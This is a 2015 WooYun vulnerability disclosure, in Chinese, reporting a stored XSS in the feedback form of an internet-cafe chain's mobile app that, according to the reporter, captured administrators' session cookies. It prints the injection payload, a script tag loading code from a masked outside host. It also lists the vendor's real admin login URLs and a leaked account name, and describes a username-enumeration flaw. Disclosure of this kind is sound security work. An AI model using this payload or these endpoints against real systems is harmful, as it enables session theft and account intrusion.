当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0106648

漏洞标题:网鱼网咖某处存储型xss(已打到管理cookies)

相关厂商:网鱼网咖

漏洞作者: 路人甲

提交时间:2015-04-08 18:46

修复时间:2015-05-23 18:48

公开时间:2015-05-23 18:48

漏洞类型:xss跨站脚本攻击

危害等级:中

自评Rank:20

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-04-08: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-05-23: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

事情是这样的。。。

详细说明:

WooYun: 网鱼网咖鱼泡泡手机应用getshell然后ke刷各种支持网吧的网费
不知道重不重复,重复了就忽略吧
手机APP反馈处。。。。。
插入代码

</textarea>'"><script src=http://*******/Udw3Gi></script>


鱼泡泡.png


一开始我去访问此链接时候 打不开(很纳闷)
弄来弄去直接去万网查了:whois +此地址

yuyuy.png

我以为是微软了,,,我记得没盲打过微软,
最后想到了挂下vpn访问下看看此地址
最终网鱼网咖客服后台出现在我面前

漏洞证明:

yuy111.png


另外还有 http://wywk-cms-01.chinacloudapp.cn:8080/NetCafe/login.jsp
http://gms.wywk.cn/login_redirect.jsp
(http://gms.wywk.cn/login_redirect.jsp
)这个后台已经泄漏 一个账户:yetingting(没有去用burp爆破)可以看截图证明

y123.png

y456.png


有账户 =提示(用户密码错误)
无账户 =提示(没有此用户)

修复方案:

过滤 后台隐藏

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝